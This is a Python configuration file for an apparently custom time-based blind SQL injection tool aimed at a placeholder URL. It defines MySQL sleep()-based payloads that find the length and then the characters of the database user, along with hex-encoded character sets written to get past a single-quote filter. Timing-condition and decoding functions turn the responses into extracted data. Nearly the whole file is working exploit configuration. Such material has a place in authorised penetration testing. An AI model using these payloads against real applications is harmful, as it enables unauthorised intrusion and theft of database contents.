/
config.py
81 lines (67 loc) · 2.74 KB
/
config.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#
# WARNING! See the README before editing this file.
#
# 1. set the logging level for output
# DEBUG > INFO > WARN
LOGLEVEL = 'INFO'
# 2. set static HTTP request configuration values
# mark the vulnerable position with `*` in any of the following elements
# the target application URL
URL = 'https://vulnerable.application.com/path/to/file'
# query string parameters
PARAMS = 'action=get_paginated_results&page=0&rows=10&sort_by=&sort_order=asc*&time_span=1hour'
# request body parameters
DATA = None
# HTTP headers
HEADERS = {
'Cookie': 'SESSIONID=NjeThXV3lQdGdXL1pVSGFabDE0cTc0dHNjRmN',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:59.0) Gecko/20100101 Firefox/59.0'
}
# 3. define attacks
# mark insertion points with `{#}`
ATTACKS = {
0: {
# a brief description of what the attack does
'description': 'enumerate the database user length',
# the injection syntax with insertion points
'injection': ',(select+sleep(1)+from+dual+where+char_length((select+user()))%3d(select+0x{0}))',
},
1: {
'description': 'enumerate the database user',
'injection': ',(select+sleep(1)+from+dual+where+substring((select+user()),{0},1)%3d(select+0x{1}))',
},
}
# 4. select an attack from above
ATTACK = 1
# 5. define payloads
# must define a payload for each insertion point
# payloads are used in the insertion point with the corresponding index
PAYLOADS = (
# the first payload for the chosen attack is a range of numbers from 1 to 45
range(1,46),
# the second payload for the chosen attack is a character encoded in ASCII hex
# this is actually why I needed this script. the target app filtered single
# quotes and I had to pass all strings as ASCII hex to avoid using quotes
[format(ord(c), "x") for c in 'etaoinshrdlucmfwgypbvkxjqz0123456789!"#$%&\'()*+,-./:;?@[\\]^_`{|}~'],
)
# 6. define a condition to return a boolean value
# override only the logic, and not the function declaration
def condition(payload, resp, i):
# in this example, the True condition is a timed response longer than 2 seconds
elapsed = resp.elapsed.total_seconds() * 1000
return elapsed > 2000
# 7. define an action for when the condition is true
# override only the logic, and not the function declaration
# must return a character of type `str`
def success(payload, resp, i):
# in this example, the meaningful data might be in ASCII hex, so it needs to
# be decoded to the actual character for easy viewing
if type(payload[-1]) is str:
from binascii import unhexlify
# enumeration
char = str(unhexlify(payload[-1]), 'ascii')
# if it's a number, it's converted to a string representation
else:
# length
char = str(payload[-1])
return char